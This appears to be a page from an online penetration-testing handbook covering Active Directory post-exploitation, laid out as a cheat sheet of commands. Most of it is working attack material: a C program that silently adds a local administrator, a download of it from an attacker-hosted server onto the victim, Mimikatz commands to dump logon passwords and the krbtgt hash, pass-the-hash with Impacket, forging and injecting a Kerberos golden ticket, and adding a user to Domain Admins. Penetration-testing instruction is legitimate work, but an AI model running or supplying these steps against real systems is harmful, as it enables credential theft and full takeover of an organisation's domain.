๐Ÿฆธ
PEN TESTING BOOK
  • ๐Ÿ“˜PENETRATION TESTING BOOK
  • โ˜ฎ๏ธPENTESTING PROCESS
    • 1๏ธโƒฃPre-Engagement
    • 2๏ธโƒฃIntelligence Gathering / Reconnaissance
    • 3๏ธโƒฃThreat Modeling
    • 4๏ธโƒฃVulnerability Assessment
    • 5๏ธโƒฃExploitation
    • 6๏ธโƒฃPost-Exploitation
    • 7๏ธโƒฃReporting
  • ๐ŸชŸWindows Privilege Escalation
    • ๐Ÿ› ๏ธWindows Exploit Suggester
    • ๐Ÿ„โ€โ™‚๏ธWindows-Privilege-Escalation
  • ๐ŸงLinux Privilege Escalation
    • ๐Ÿ„โ€โ™€๏ธLInux-Privilege-Escalation
  • ๐ŸงLinux Exploit Development Tools
    • ๐Ÿ”งExploit Development Tools
  • ๐Ÿ•ธ๏ธWeb Application Pentesting
    • ๐Ÿ“ˆgraphql injection
    • ๐Ÿฑcross site scripting
    • ๐Ÿ’‰Command Injection
    • ๐Ÿ—ƒ๏ธfile upload vulnerability
    • ๐Ÿถflask
    • ๐Ÿฆ•idor
    • ๐Ÿ“‚local file inclusion
    • ๐Ÿš›Sensitive Data Exposure Cheat Sheet
    • ๐Ÿดwordpress pentesting
    • โŒxxe attack
    • ๐Ÿ”“Authentication Bypass
    • ๐Ÿ•ธ๏ธWebshells
    • ๐Ÿ‚SSRF
    • ๐Ÿˆโ€โฌ›Git Exposure
    • โœ–๏ธXSS WAF Bypass
    • XPath Injection
  • ๐Ÿ”Reverse Engineering
    • ๐Ÿฒintro to ghidra
  • ๐Ÿฆนโ€โ™‚๏ธNetwork Pentesting 101
    • โ˜ข๏ธRouter Setup
      • Vyatta Router VM Setup Guide
    • ๐Ÿ”ขEnumeration
      • 22, 161, 162 - SSH, SNMP
    • ๐Ÿง™Brute Force Attacks
      • Brute Forcing Cheat sheet
    • ๐Ÿ›‚Post Exploitation
    • Firewall Pentesting
  • ๐Ÿ”…Internet of Things
    • ๐Ÿ“ณEnumerating IoT Devices
    • ๐Ÿ˜ทDissecting Embedded Devices
    • ๐Ÿ‘จโ€๐Ÿ’ปExploiting Embedded Devices
    • ๐ŸŽฎDynamic Analysis with Emulation
    • โ˜ฎ๏ธFirmware Analysis
      • Firmware Analysis
      • Bootloader testing
    • Drone Pentesting
      • Common Attacks
      • Threat Categories
    • Hacking Vending Machines
  • ๐Ÿš”Automotive Pentesting
    • ๐Ÿ”ŒVirtual CAN
      • Dump Traffic
  • ๐Ÿ—ณ๏ธContainer Pentesting
    • ๐Ÿณdocker pentesting
    • ๐Ÿ‹docker container escape
    • ๐Ÿ‹Docker CVE's
    • โ˜ธ๏ธkubernetes pentesting
  • ๐ŸŒ†SMART CITY PENTESTING
    • โ™พ๏ธProtocols
      • LoRa-WAN
  • ๐ŸชฆACTIVE DIRECTORY PENTESTING
    • ๐ŸŒŒActive Directory Post Exploitation
  • โ˜„๏ธCommand and Control
    • ๐ŸŒฉ๏ธC2 In The Cloud
    • ๐Ÿ”C2 HTTP Redictor
    • โ˜ธ๏ธHavoc C2
    • โ›ŽSliver C2
    • ๐Ÿฆ„Mythic C2
  • ๐Ÿฆ‹PENTESTING CISCO DEVICES
    • ๐Ÿ”ฆCisco-Torch : Enumeration
    • ๐Ÿ”“Password Attack (Type 5)
  • RED TEAMING
    • ๐Ÿฆ•Initial Access
      • โš”๏ธWeaponization
    • ๐Ÿ”ฅFrameworks
      • Atomic Red Team
      • MITRE Caldera
Powered by GitBook
On this page
  • Active Directory Post Exploitation
  • Access Users Remotely
  • Gathering Info
  • Privilege Escalation
  • Stealing Credentials
  • Forging Golden Tickets
  • REFERENCES

Was this helpful?

  1. ACTIVE DIRECTORY PENTESTING

Active Directory Post Exploitation

Active Directory Post Exploitation

Access Users Remotely

Xfreerdp

xfreerdp /u:mike /p:P@ssword /d:homeserver.local /v:192.168.56.13 /w:1920 /h:1080 /fonts /smart-sizing

Gathering Info

Cmd

# Get current user's detail
whoami

# View Groups
whoami /groups

# View all users in the domain
net user

Privilege Escalation

Powershell

View Running Services

 Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartName | Where-Object {$_.State -like 'Running'}

View Start Mode of Services

Get-CimInstance -ClassName Win32_Service -Filter "Name='<service name>'" | Select-Object StartMode

Check Permissions using ICACLS

icacls "File Name/Path"

C Program

Adduser.c

#include<stdio.h>
#include<stdlib.h>

int main()
{

        int i;
        
        i = system("net user peter P@ssword /add");
        i = system("net localgroup administrators peter /add");

        return 0;

}

Compile

x86_64-w64-mingw32-gcc exploit.c -o adduser.exe

Share the Exe

# Attacker Machine
python3 -m http.server

# Victim Machine
iwr -Uri http://10.10.10.10/<file.exe> -OutFile <file.exe>

Stealing Credentials

Mimikatz

# Start mimikatz
.\mimikatz.exe

# Dump hahses
privilege::debug

sekurlsa::logonpasswords

Impacket

Wmiexec

impacket-wmiexec -hashes :<NT Hash> domain/user@<IP>

# Vew powershell history
cd C:\users\jack\appdata\roaming\microsoft\microsoft\windows\powershell\psreadline

PsExec

# Accessing the domain controller
.\PSExec64.exe \\dc01 cmd.exe

Forging Golden Tickets

Get krbtgt Hash and Domain SID

.\mimikatz.exe

privilege::debug

# Dump Hashes
lsadump::lsa /patch

Create Golden Ticket

.\mimiktaz.exe

kerberos::purge

# Creating Ticket

kerberos::golden /user:<any user> /domain:homeserver.local /sid:<domain sid> /krbtgt:<krbtgt hash> /ticket:homeserver_golden

Using Golden Ticket

Powershell

.\mimikatz.exe

kerberos::ptt homeserver_golden

misc::cmd

PsExec

PsExec.exe \\dc01 cmd.exe

# Add a user to domain
net user mike P@ssword /add /domain 

# Add a user to domain group
net group "domain admins" mike /add /domain

REFERENCES

  • https://www.mankier.com/1/xfreerdp

  • https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/icacls

  • https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service

  • https://www.netwrix.com/how_golden_ticket_attack_works.html

  • https://docs.metasploit.com/docs/pentesting/active-directory/kerberos/forge_ticket.html

  • https://www.youtube.com/watch?v=f8jGhLwCa28&pp=ygUgd2luZG93cyBwZW50ZXN0IGFjdGl2ZSBkaXJlY3Rvcnk%3D

  • https://www.hackingarticles.in/understanding-guide-mimikatz/

  • https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket

PreviousLoRa-WANNextC2 In The Cloud

Was this helpful?

๐Ÿชฆ
๐ŸŒŒ